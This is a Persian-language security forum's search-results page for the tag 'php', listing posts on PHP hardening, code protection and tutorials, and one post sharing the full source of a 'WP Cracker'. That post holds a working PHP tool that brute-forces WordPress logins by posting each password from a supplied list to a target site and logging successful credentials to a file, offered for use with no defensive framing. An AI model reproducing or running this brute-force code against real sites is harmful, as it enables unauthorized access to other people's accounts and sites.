رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'php'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • تالار اصلی سایت
    • قوانین سایت
    • آسیب پذیری های کشف و گزارش شده
    • رقابت های فتح پرچم ( CTF )
    • بخش سوال و جواب های عمومی
  • بخش تست نفوذ پذیری
    • اخبار دنیای امنیت
    • باگ بانتی (Bug Bounty)
    • ابزارهای امنیتی و آنالیز سیستم ها
    • ویدیو های آموزشی آزمایشگاه امنیت
    • تحلیل و بررسی آسیب پذیری های سایت و سرورها
    • امنیت سیستم های شخصی
    • امنیت شبکه های وایرلس
    • ابزار و اسکریپت های امنیتی
    • Vulnerability Laboratory
  • بخش مدیریت شبکه
    • امنیت شبکه و سرور (Network Security)
    • آموزش های سرورهای ویندوز (Windows Server)
    • مدیریت شبکه
    • مجازی سازی
    • کشف جرائم رایانه ای (Forensics)
    • Library
  • بخش برنامه نویسی و کامپیوتر
    • کامپیوتر
    • برنامه نویسی تحت وب
    • برنامه نویسی تحت دسکتاپ
    • سیستم عامل
  • بخش کرک (Crack)

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me


Name


Telegram


Instagram


Main os


Twitter


Skype

5 نتیجه پیدا شد

  1. یکی از اقدامات امنیتی برای کانفیگ PHP در وب سرور Apache ( یا هر وب سروری ) عدم نمایش خطاهای مفسر PHP نظیر Warning Error ، Parse Error ، Deprecated و ... است که موجب ایجاد باگ Full Path Disclosure می شود ! در فایل /etc/php.d/security.ini/ مقادیر زیر را تغییر دهید : display_errors=Off log_errors=On error_log=/var/log/icg.log با اضافه / تغییر کد بالا این کانفیگ اعمال می شود که هیچ PHP Error برای کاربران سایت مشاهده نخواهد شد و تمامی PHP Errors در فایل /var/log/icg.log ذخیره خواهد شد ! نمونه باگ ایجاد شده از عدم کانفیگ این دستورالعمل : دیگر آموزش های امنیت PHP در وب سرور Apache : مخفی سازی ورژن و OS Name در وب سرور Apache مخفی سازی ورژن PHP در وب سرور Apache
  2. سلام خسته نباشید می خواستم بدون راهی برای جلوگیری از کپی کردن کد های php هست ؟ یه افزونه ورپرس نوشته شده حالا برنامه نویس چون این افزونه رو در اختیار مشتری قرار میده می خواد یک طوری جلوشو بگیره که مثلا با یک مقدار تغییر اونو به نام خودش نکنه و محتوا افزونه یا کد رو حفظ کنه باتشکر اگر راهنمایی کنیید ممنون می شوم
  3. 504w

    | آموزش توابع Php |

    سلام قصد دارم اموزش توابع php رو تو این تاپیک شروع کنم این تاپیک بدرد کسایی میخوره ک سینتکس رو یاد گرفتن و میخوان php رو بصورت پیشرفته یاد بگیرن اموزش ها بصورت موضوعی هستن ب ان شکل ک تو هر پست توابعی ک مربوط ب یک موضوع هستن آموزش داده میشن (مثلا توابع کار با فایل هادر یک پست)
  4. 504w

    Php Curl Lib

    با عرض سلام تو این تاپیک قراره ک آپشن های کتابخانه curl در php رو آموزش بدیم + مثال کتابخانه curl برای اتصال بین دو سرور بکار برده میشه تقریبا میشه گفت مثل تابع file_get_contents ولی خیلی پیشرفته تر اگه مشکلی داشتین تو پ.خ با ما همراه باشید
  5. 504w

    Irancyber [php] Wp Cracker

    با سلام خیلی خوشحالم ازین که در جمعتونم امیدوارم مورد قبول واقع بشم اینم ی برنامه کرکر وردپرس تقدیم ب شما <html> <head> <title>WP Cracker By 504w</title> <style type="text/css"> .input{ width:300px; height: 30px; border: thin solid #8000FF; color: #8000FF; padding: 5px; } .input2{ width:400px; max-width: 400px; height: 450px; max-height: 450px; border: thin solid #8000FF; color: #8000FF; padding: 5px; } .btn{ width: 100px; height: 30px; color: #ffffff; border: none; background-color: #8000FF; } h3{ color: #8000FF; } </style> </head> <body> <div style="text-align: center;"> <h3>[ IranCyber ] WP Cracker Coded By 504w</h3> <form action="<?php $_SERVER['PHP_SELF'] ?>" method="POST"> <input type="text" name="username" placeholder=" Username" class="input" /> <br /><br /> <input type="text" name="url" placeholder="Url" class="input"/><br /><br /> <textarea name="passlist" class="input2" placeholder="PassWord List"></textarea> <br /> <input type="submit" name="submit" class="btn"/> </form> </div> </body> </html> <?php set_time_limit(0); ignore_user_abort(true); if(isset($_POST['submit'])){ $log = $_POST['username']; $pwd = explode("\n" , $_POST['passlist']); $wp_login = $_POST['url']; function check($log , $pwd , $wp_login , $cookie){ $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $wp_login); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt($ch, CURLOPT_HEADER , 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . $log . '&pwd=' . $pwd . '&redirect_to=wp-admin/&rememberme=forever&testcookie=1'); ob_start(); $response = curl_exec ($ch); ob_end_clean(); curl_close ($ch); unset($ch); $GLOBALS['f'] = 0; if(preg_match("/wordpress_logged_in/" , $response)){ echo "Found : <a href='Founds.txt' target='_blank' > Click </a>"; $str = "\r\n\r\nUserName : $log \r\nPassword : $pwd \r\nUrl : $wp_login \r\n\r\n==================================="; $file = fopen("Founds.txt" , "a+"); fwrite($file , $str); fclose($file); $GLOBALS['f']++; } } foreach($pwd as $pwds){ check($log , $pwds , $wp_login , $cookie); } if($f===0){ echo "Not found !"; } } Edited : https://github.com/504w/wordpress-cracker

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...